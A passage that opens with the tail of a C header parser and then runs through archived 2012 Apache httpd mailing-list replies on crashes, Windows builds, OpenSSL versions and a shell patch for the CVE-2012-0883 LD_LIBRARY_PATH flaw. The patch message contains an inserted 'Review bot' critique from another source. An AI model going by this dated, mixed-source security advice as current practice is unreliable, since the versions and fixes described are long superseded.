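                value = trim(header, eq + 1, end);   // may be "" if truncated
                return true;
            }
        }
        pos = end + 1;   // skips valueless tokens and empty ";;" runs
    }
    return false;
}
```

The loop's only index arithmetic is `end + 1` on a position already bounded by `header.size()`, so the worst a malformed header can do is end the scan early with "not found".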



Re: [users@httpd] Win32 Binary without crypto (no mod_ssl) (MSI Installer): httpd-2.2.23-win32-x86-no_ssl.msi

2012-10-22 Thread William A. Rowe Jr.
On 10/22/2012 1:18 PM, Yehuda Katz wrote:
 Any idea what would be required for someone who wanted to volunteer to manage 
 windows builds?

Binaries are created/distributed only by httpd committers as a matter
of policy (irrespective of platform).  This is due to the ASF's own
liabilities and web of trust policy.  There are external vendors and
distributors of httpd, anyone is welcome to build and/or distribute
ASF sources, we neither endorse nor dissuade users from using such
distributions.  Note that problem reports on 'distributor X's package'
belong on that distributor's forum or site, not on ASF issue trackers.
All that said, thanks for offering, and if you wish to become a
committer it is a matter of consistent contributions in the form of
patches to the dev@ or docs@ list!

I've personally been deeply disconnected from httpd due to rearranging
a host of build machines between physical machines, and a completely
bugged email provider, but hope to be back in a position to create new
httpd 2.2.23 (with a 0.9.8 openssl refresh) sometime this week.  Then
on to working on the WiX based 2.4 installer so we can throw away the
IS mess.

Cheers,

Bill





Re: [users@httpd] Segmentation fault error

2012-05-30 Thread William A. Rowe Jr.
You didn't dump the offending stack, you dumped the first stack.  It's highly
unlikely there was a segfault in _read.

You need to dump all the thread stacks, and work out the offending one; this is
usually designated FAULT or some other indication of where the fault occurred.

On 5/30/2012 10:32 AM, Ishita Kapadiya wrote:
 Thanks Nick.
 I have compiled Apache for myself both the time and both are 32-bit.
 The same modules all other instances are using and thus i am not sure
 what is different with this instance that causing Segmentation fault
 error.
 
 I tried to dig more into it and here is what i got -
 
 mdb core
 ::stack
 libc.so.1`_read+0xc(6, ffbff5e3, 1, 0, 10b4, fef73ac0)
 ap_mpm_pod_check+0x18(d6800, 68764, 68f8c, 1b7ec0, 0, 1)
 child_main+0x2d4(0, 682dc, 0, fee58000, fef73700, fedf2a00)
 make_child+0x128(9bc00, 0, 1, 9cc00, 9b400, 9c800)
 ap_mpm_run+0x740(fe720058, 4, 0, a, 1, 0)
 main+0x77c(a7810, 99c00, 9bc00, 9bc00, a5808, 0)
 _start+0x5c(0, 0, 0, 0, 0, 0)
 
 pstack core
  fef45874 _read(6, ffbff5e3, 1, 0, 10b4, fef73ac0) + c
  0006b714 ap_mpm_pod_check (d6800, 68764, 68f8c, 1b7ec0, 0, 1) + 18
  000697b4 child_main (0, 682dc, 0, fee58000, fef73700, fedf2a00) + 2d4
  00069930 make_child (9bc00, 0, 1, 9cc00, 9b400, 9c800) + 128
  0006a160 ap_mpm_run (fe720058, 4, 0, a, 1, 0) + 740
  00029bc8 main (a7810, 99c00, 9bc00, 9bc00, a5808, 0) + 77c
  00028f7c _start   (0, 0, 0, 0, 0, 0) + 5c
 
 pmap core
 0001 448K r-x--  /abc/apache-2.2.22/bin/httpd
 0008  32K r-x--
 00096000  24K rwx--  /abc/apache-2.2.22/bin/httpd
 0009C000  16K rwx--  /abc/apache-2.2.22/bin/httpd
 000A6528K rwx--[ heap ]
 FAB7A000   8K rw---[ stack tid=36 ]
 ...
 (removed rest of the lines to avoid length)
 
 mdb /abc/apache-2.2.22/bin/httpd
 
 ::dis ap_mpm_pod_check!head
 ap_mpm_pod_check:   save  %sp, -0x78, %sp
 ap_mpm_pod_check+4: ld[%i0], %o1
 ap_mpm_pod_check+8: call  +0x2d0e0  PLT:apr_os_file_get
 ap_mpm_pod_check+0xc:   add   %fp, -0x14, %o0
 ap_mpm_pod_check+0x10:  ld[%fp - 0x14], %o0
 ap_mpm_pod_check+0x14:  add   %fp, -0x15, %o1
 ap_mpm_pod_check+0x18:  call  +0x2cdc4  PLT:read
 ap_mpm_pod_check+0x1c:  mov   1, %o2
 
 Please help me what could be the problem? It's affecting my production
 env and i really don't know what to do next?
 
 On Tue, May 29, 2012 at 7:15 PM, Nick Kew n...@webthing.com wrote:

 On 29 May 2012, at 23:11, Ishita Kapadiya wrote:

 Hi All,

 I am using this configurations -

 Solaris sparc 10/apache 2.2.22/openssl 1.0.0g/simteminder sso/mod-jk 1.30

 Did you compile everything yourself?

 If yes, could any compile options have changed?  E.g. between 32-bit and 
 64-bit,
 or something less obvious but just as important?

 If no, what suppliers do your binaries come from, and have you checked with 
 them?

 --
 Nick Kew

 
 
 
 





Re: [users@httpd] LD_LIBRARY_PATH issue in 2.2.22 and earlier

2012-05-24 Thread William A. Rowe Jr.
On 5/24/2012 12:05 PM, Luke Lozier wrote:
 One of the PCI scanning companies is demanding an upgrade to 2.4.2 due to the 
 issues
 described in this CVE:
 
 Changes with Apache 2.2.23
 
   *) SECURITY: CVE-2012-0883 (cve.mitre.org http://cve.mitre.org)
  envvars: Fix insecure handling of LD_LIBRARY_PATH that could lead to the
  current working directory to be searched for DSOs. [Stefan Fritsch]
 
 Is there any idea when 2.2.23 will be released? I'd rather not upgrade to 
 2.4.2

Modify your installed envvars (and envvars-std) script and apachectl (or equivalent
script provided by your application vendor) to ensure that this code is changed;


@@ -18,6 +18,10 @@
 #
 # This file is generated from envvars-std.in
 #
-LD_LIBRARY_PATH=/path/to/httpd/lib:$LD_LIBRARY_PATH
+if test x$LD_LIBRARY_PATH != x ; then
+  LD_LIBRARY_PATH=/path/to/httpd/lib:$LD_LIBRARY_PATH
+else
+  LD_LIBRARY_PATH=/path/to/httpd/lib
+fi
 export LD_LIBRARY_PATH
 #
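Review bot: the guard on the `+if test x$LD_LIBRARY_PATH != x ; then` line leaves `$LD_LIBRARY_PATH` unquoted, so an inherited value containing whitespace splits into several words, `test` fails with status 2, and the `else` branch runs and drops the caller's entries before `export LD_LIBRARY_PATH`; write `if test "x$LD_LIBRARY_PATH" != x ; then`. The guard also covers only the fully empty case: an inherited value with an empty element (`/opt/lib:` or `:/opt/lib`) still leaves an empty path component, which the dynamic loader treats as the current working directory, the very problem this hunk is meant to close, so a complete fix should also strip leading, trailing and doubled colons from the inherited value before prepending `/path/to/httpd/lib`.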

On oddball platforms this may be LIBPATH or SHLIB_PATH instead of 
LD_LIBRARY_PATH.
If your platform's apachectl script invokes envvars, you are done.  If it 
doesn't,
there may be an insecure LD_LIBRARY_PATH assignment, just use the example above.

Upgrading for this defect is frankly silly, although effective.  There is no 
planned
date yet for 2.2.23 although it will come along sometime in the not too distant
future.




Re: [users@httpd] Denial of Service due to multiplication of httpd running

2012-05-22 Thread William A. Rowe Jr.
On 5/22/2012 12:02 PM, Bill Unruh wrote:
 
 Eg, here is one entry from the ps auxww  list
 
 apache   18137  0.0  0.5  26844  5744 ?S09:34   0:00 
 /usr/sbin/httpd -f
 /etc/httpd/conf/httpd.conf -DAPACHE2 -DHAVE_PERL -DHAVE_PHP5 -DHAVE_ACTIONS 
 -DHAVE_ALIAS
 -DHAVE_ASIS -DHAVE_AUTH_BASIC -DHAVE_AUTH_DIGEST -DHAVE_AUTHN_ALIAS 
 -DHAVE_AUTHN_ANON
 -DHAVE_AUTHN_DBM -DHAVE_AUTHN_DEFAULT -DHAVE_AUTHN_FILE -DHAVE_AUTHZ_DBM
 -DHAVE_AUTHZ_DEFAULT -DHAVE_AUTHZ_GROUPFILE -DHAVE_AUTHZ_HOST 
 -DHAVE_AUTHZ_OWNER
 -DHAVE_AUTHZ_USER -DHAVE_AUTOINDEX -DHAVE_BUCKETEER -DHAVE_CASE_FILTER
 -DHAVE_CASE_FILTER_IN -DHAVE_CERN_META -DHAVE_CGI -DHAVE_CGID 
 -DHAVE_CHARSET_LITE
 -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ECHO -DHAVE_ENV -DHAVE_EXAMPLE -DHAVE_EXPIRES
 -DHAVE_EXT_FILTER -DHAVE_FILTER -DHAVE_HEADERS -DHAVE_IDENT -DHAVE_IMAGEMAP 
 -DHAVE_INCLUDE
 -DHAVE_INFO -DHAVE_LOG_CONFIG -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME
 -DHAVE_MIME_MAGIC -DHAVE_NEGOTIATION -DHAVE_OPTIONAL_FN_EXPORT 
 -DHAVE_OPTIONAL_FN_IMPORT
 -DHAVE_OPTIONAL_HOOK_EXPORT -DHAVE_OPTIONAL_HOOK_IMPORT -DHAVE_REWRITE 
 -DHAVE_SETENVIF
 -DHAVE_SPELING -DHAVE_SSL -DHAVE_STATUS -DHAVE_SUBSTITUTE -DHAVE_SUEXEC 
 -DHAVE_UNIQUE_ID
 -DHAVE_USERTRACK -DHAVE_VERSION -DHAVE_VHOST_ALIAS

Never seen such a crazy startup line, I presume all of your modules have
individual IfDefine blocks around each?

 At that time in the access_log I have a whole bunch of entries like
 ::1 - - [22/May/2012:09:34:22 -0700] OPTIONS * HTTP/1.0 200 - - 
 Apache/2.2.22
 (Mandriva Linux/PREFORK-0.1mdv2010.2) (internal dummy connection)

That's your own local loopback from a process running on this same box.

 In the past I have also had connections like 66.249.68.198 - - 
 [22/May/2012:09:35:25
 -0700] GET
 /aggregator/www.umsl.edu/~keelr/010/www.twitter.com/www.iaea.org/Publications/Documents/Board/2008/www.environment-agency.gov.uk/homeandleisure/floods/node/www.guardian.co.uk/business/2012/feb/21/node/node/22?page=11
 HTTP/1.1 200 58609 - Mozilla/5.0 (compatible; Googlebot/2.1;
 +http://www.google.com/bot.html)

No clue.  Maybe playing with open proxies?  The document seems to be 58k if 
that helps you
at all (maybe a local index page?)

 In the error log around that time I get nothing that looks suspicious
 
 [Tue May 22 09:31:54 2012] [error] [client 119.63.196.27] File does not exist:
 /usr/local/http/htdocs/robots.txt
 [Tue May 22 09:32:25 2012] [error] [client 86.68.18.171] File does not exist:
 /usr/local/http/htdocs/favicon.ico

Certainly harmless and most common from crawlers and web browsers respectively. 
 You may
want to add a simple one line robots.txt file, and a simple default icon.


 [Tue May 22 09:36:47 2012] [error] [client 89.144.206.157] File does not 
 exist:
 /usr/local/http/htdocs/thirdman/reichs/blank.gif, referer:
 http://axion.physics.ubc.ca/thirdman/reichs/reichsbruecke.htm

Your own mistake in the html, it seems.

Can you interrupt one of the truly hosed processes using gdb and try 'thread 
apply all bt'




Re: [users@httpd] Denial of Service due to multiplication of httpd running

2012-05-22 Thread William A. Rowe Jr.
On 5/22/2012 6:00 PM, Bill Unruh wrote:
 On Tue, 22 May 2012, William A. Rowe Jr. wrote:
 
 On 5/22/2012 12:02 PM, Bill Unruh wrote:

 At that time in the access_log I have a whole bunch of entries like
 ::1 - - [22/May/2012:09:34:22 -0700] OPTIONS * HTTP/1.0 200 - - 
 Apache/2.2.22
 (Mandriva Linux/PREFORK-0.1mdv2010.2) (internal dummy connection)

 That's your own local loopback from a process running on this same box.
 
 There are no processes running on this same box. It is rarely used. and
 certainly did not have a browser running at that time.

Then a server module is likely pinging itself.  Any chance you set up an 
infinite proxy
recursion here?

 In the past I have also had connections like 66.249.68.198 - - 
 [22/May/2012:09:35:25
 -0700] GET
 /aggregator/www.umsl.edu/~keelr/010/www.twitter.com/www.iaea.org/Publications/Documents/Board/2008/www.environment-agency.gov.uk/homeandleisure/floods/node/www.guardian.co.uk/business/2012/feb/21/node/node/22?page=11

 HTTP/1.1 200 58609 - Mozilla/5.0 (compatible; Googlebot/2.1;
 +http://www.google.com/bot.html)

 No clue.  Maybe playing with open proxies?  The document seems to be 58k if 
 that helps you
 at all (maybe a local index page?)
 
 There is no such file or path on my system. If I try to use it, I get file not
 found. I have nothing called /aggregator/

Looking more and more like a proxy recursion/infinite looping sort of config 
error.

 Can you interrupt one of the truly hosed processes using gdb and try 'thread 
 apply all bt'
 
 What does that do?

Dumps all threads instead of just one of them.

 Thread 1 (Thread 0xb760f700 (LWP 20861)):
 #0  0xe424 in __kernel_vsyscall ()
 #1  0xb77ece6b in fcntl () from /lib/i686/libpthread.so.0
 #2  0xb780f832 in ?? () from /usr/lib/libapr-1.so.0
 #3  0xb780f1ad in apr_proc_mutex_lock () from /usr/lib/libapr-1.so.0
 #4  0x0809294c in ?? ()
 #5  0x08092e0b in ?? ()
 #6  0x08093be4 in ap_mpm_run ()
 #7  0x08064cd1 in main ()

It might be helpful to first install the debuginfo for the apr/httpd packages, 
but this
looks like it might be in the accept queue waiting on the MutexFile to unblock 
this one
(and is probably a healthy process).

If you are running prefork we would encourage you to try the worker mpm.




Re: [users@httpd] mod_fcgid + daemon implemented in C

2012-05-09 Thread William A. Rowe Jr.
On 5/9/2012 8:41 AM, Henrik Strand wrote:
 
 I want to use mod_fcgid (http://httpd.apache.org/mod_fcgid/) with a
 daemon implemented in C. Is there a lib available like the one from the
 FastCGI project (http://www.fastcgi.com/) to use for a fcgi_accept()
 function? Or do I have to implement one myself?

If you want to manage the pool of fcgi workers yourself, please take a moment to
look at mod_proxy_fcgi as a possible solution for processing the requests in lieu
of mod_fcgid. The former only streams requests/responses, while the latter also
handles all of the process pool management.  [And if we were clever and had time
on our hands, we would jettison the request pipeline from mod_fcgid in favor of
delegating that work to mod_proxy_fcgi ;-]




Re: [users@httpd] How to differentiate between Graceful restart and stop in apache extended module

2012-05-07 Thread William A. Rowe Jr.
On 5/7/2012 6:37 AM, vk.indushekar VK wrote:
 Hi,
 We developed a apache module mod_xx.so. We have a requirement where in we
 need to differentiate between apache graceful restart and normal stop. We
 need to execute certain part of the code for graceful restart only.
 
 So how do we differentiate between graceful restart and normal stop in
 apache extended modules.

Such questions about internal program state and c code are better addressed
to the modules-...@httpd.apache.org peer module hacking and development list.





Re: [users@httpd] Upgrading OpenSSL without upgrading Apache. Can it be done???

2012-04-24 Thread William A. Rowe Jr.
On 4/24/2012 3:09 PM, TFML wrote:
 I'm assuming you're using some sort of Windows operating system.  I haven't 
 done one in a
 few years, but I would assume the 1.0 version
 from http://slproweb.com/products/Win32OpenSSL.html should work like 
 installing any other
 Windows Installer.  If someone else can't answer this, I'd suggest setting up 
 a virtual
 environment and giving it a try before doing it on a production system.

Just as on unix, you can never drop in a x.y.n change with a new x value.
That's called a major bump and usually does not work.

OP could obtain a 0.9.8X flavor later than 0.9.8t and ought to be fine so long
as no special build options were changed, and it was built to run against
msvcrt.dll (the *system* c library).  It's the same quandary as on Ubuntu with
glibc vs eglibc packages.

If OP reviewed the patch release notes, they would be aware that an upgrade
is unnecessary between 0.9.8t and 0.9.8w for anyone running httpd 2.2.  The
new features in httpd 2.4 were vulnerable to issues there, however.








Re: [users@httpd] Upgrading OpenSSL without upgrading Apache. Can it be done???

2012-04-24 Thread William A. Rowe Jr.
On 4/24/2012 4:05 PM, bfinkel...@aaamissouri.com wrote:
 
 Great thanks for the info!
 
 Where can I find out when apache.org will be bundling the latest version of 
 OpenSSL with
 apache?  PCI compliance calls for using level u as of today.

If you had read the notices from the OpenSSL project you would be aware
that the particular flaws in openssl 0.9.8 .u, .v and .w do not pertain
to the operation or deployment of httpd 2.2.x.  They do apply to the
operation of httpd 2.4, and administrators of 2.4 should upgrade ASAP.
(And if you were running 2.3-beta, upgrading httpd to 2.4 would be a very
wise move as well for httpd security flaws).

AFAIK only the windows binary 'bundles' openssl.  As that binary is not
affected it will not be updated, certainly not unless an httpd 2.2.23 is
released.

The ASF provides binaries only as a convenience and at our leisure; if
you are professionally responsible for an installation of httpd, openssl
and so forth which you refuse to compile yourself, you would probably
benefit from contracting for the services you are demanding.  The ASF
is here to collaboratively produce source code.





Re: [users@httpd] PHP doesn't process pages

2012-04-22 Thread William A. Rowe Jr.
On 4/22/2012 6:08 AM, Noel Butler wrote:
 John,
 
 On Sun, 2012-04-22 at 17:34 +1000, Noel Butler wrote:
 

 I note your using php 5.4.0 - all my testing has been with 5.3.10 and is 
 done on
 Slackware, but I do have one RHEL 5.2
 I'll throw 5.4 on the dev box if I get a chance later (almost dinner time 
 here) and see
 what blows up :)

 [Sun Apr 22 20:59:26.195710 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10200 exit signal Segmentation fault (11)
 [Sun Apr 22 21:00:07.236804 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10111 exit signal Segmentation fault (11)
 [Sun Apr 22 21:00:58.287673 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10308 exit signal Segmentation fault (11)
 [Sun Apr 22 21:01:57.346649 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10112 exit signal Segmentation fault (11)
 
 
 Confirmed bug 2.4.2  w/php 5.4.0: I suggest you log a bug report with php 
 development team

Please don't do that to other dev teams either.  Before you refer users, make sure
they know how to give something helpful to the OP, the corresponding backtrace.
It radically improves the odds of their bug report being reviewed and acted on.

http://httpd.apache.org/dev/debugging.html





